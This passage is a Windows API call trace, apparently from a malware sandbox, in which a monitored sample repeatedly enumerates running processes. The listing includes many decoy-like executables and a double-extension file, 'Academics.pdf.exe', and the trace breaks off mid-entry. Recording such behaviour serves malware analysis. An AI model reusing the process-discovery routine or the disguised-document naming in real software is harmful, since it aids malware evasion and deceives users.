[0280.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0280.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0280.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0280.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0280.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0280.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0280.413] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0280.419] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.421] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0280.422] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0280.423] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.427] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0280.427] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.428] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0280.432] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0280.438] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0280.439] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0280.440] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.441] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.442] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.442] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.443] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.444] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0280.454] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.455] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.456] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0280.456] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0280.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0280.464] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0280.466] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.470] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0280.471] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0280.473] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0280.476] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0280.480] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0280.482] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0280.483] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0280.484] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0280.488] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0280.490] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0280.504] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0280.513] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0280.519] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0280.528] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0280.533] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0280.537] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0280.542] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0280.547] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0280.557] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0280.574] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.587] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.597] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0280.612] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.623] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0280.625] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.626] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0280.628] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0280.652] CloseHandle (hObject=0x294) returned 1 [0280.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0280.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0280.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0280.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0280.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0280.657] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0280.657] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0280.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0280.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0280.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0280.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0280.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0280.669] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0280.674] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.687] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0280.689] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0280.689] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.690] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0280.691] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.692] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0280.693] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0280.694] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0280.695] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0280.696] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.697] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.698] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.699] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.700] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.700] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0280.701] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.702] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.703] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0280.704] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0280.705] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0280.706] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0280.708] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.709] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0280.710] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0280.711] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0280.711] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 